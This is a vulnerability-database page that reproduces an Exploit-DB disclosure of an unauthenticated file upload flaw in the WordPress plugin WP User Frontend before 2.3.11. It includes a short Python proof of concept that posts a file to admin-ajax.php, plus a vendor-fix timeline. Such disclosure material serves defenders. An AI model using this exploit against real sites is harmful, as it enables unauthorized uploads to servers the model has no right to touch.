Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload

🗓️ 08 Feb 2016 00:00:00Reported by Panagiotis VagenasType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 18 Views

WordPress Plugin WP User Frontend < 2.3.11 Unrestricted File Upload vulnerability in wpuf_file_upload and wpuf_insert_image actions. Allows anyone to upload files to the server without privilege requirement. Vendor released v2.3.11 to fix the issue

Code
'''
* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: < 2.3.11
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress


Description
-----------

WordPress plugin _WP User Frontend_ suffers from an unrestricted file uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or `wpuf_insert_image` actions to upload any file which pass the WordPress mime and size checks.

The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.

PoC
---
'''
 

#!/usr/bin/python3

################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <[email protected]>
################################################################################

import requests
import tempfile

url = 'http://example.com/wp-admin/admin-ajax.php'

postData = {
    'action': 'wpuf_file_upload'
}

file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')

file.write('A'*32)

file.seek(0)

files = {'wpuf_file': file}

r = requests.post(url, data=postData, files=files)

file.close()

if r.text != 'error':
    print('Success!')
    print(r.text)
else:
    print('error')

exit(0)

'''
Timeline
--------

1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue
'''

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2016 00:00Current
7.4High risk
Vulners AI Score7.4
wordpressuser frontendfile uploadunrestrictedvulnerabilityvendorsecurity checkcveexploitdisclosurewebappsprivilegeserverwordpress 4.4.2timeline
18